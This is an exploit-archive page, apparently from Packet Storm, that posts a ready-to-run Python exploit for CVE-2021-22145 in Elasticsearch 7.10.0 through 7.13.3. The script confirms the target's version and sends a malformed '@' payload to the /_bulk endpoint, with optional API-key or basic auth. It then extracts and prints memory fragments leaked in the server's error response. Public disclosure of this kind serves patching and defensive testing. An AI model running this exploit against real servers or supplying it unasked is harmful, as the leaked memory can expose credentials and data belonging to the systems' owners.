exploit the possibilities

ElasticSearch 7.13.3 Memory Disclosure

ElasticSearch 7.13.3 Memory Disclosure
Posted Jul 23, 2021
Authored by r0ny

ElasticSearch version 7.13.3 memory disclosure exploit.

tags | exploit, info disclosure
advisories | CVE-2021-22145
MD5 | 128e0970c644272d608d5ebe1bafc7e5

ElasticSearch 7.13.3 Memory Disclosure

Change Mirror Download
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure 
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145

#/usr/bin/python3

from argparse import ArgumentParser
import requests
from packaging import version
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("\n################################################################################################")
print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######")
print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######")
print("################################################################################################\n")
parser = ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
args = parser.parse_args()

if not (args.url):
parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')

#Prepare authentication header
authorization_header = ""
if(args.api_key or args.basic):
authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic

#Check elasticsearch version
r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
try:
es_version = json.loads(r.content)["version"]["number"]
except:
print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
print("# Server response: " + str(r.content))
exit()

if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
print("# Elastic Service not vulnerable")
print("# Elastic Service version: " + es_version)
print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3")
exit()

#Prepare exploitation
payload = "@\n"
vulnerable_endpoint = "/_bulk"
url = args.url + vulnerable_endpoint

#Exploitation
print("# ElasticSearch Version: " + es_version)
print("# Request to " + url+"\n")
r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)

#Read Memory Leak and remove stacktrace

print("$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$$$$$ Memory Leaked $$$$$")
print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
response = json.loads(r.content)
leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
print(leak1+"\n"+leak2)

Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close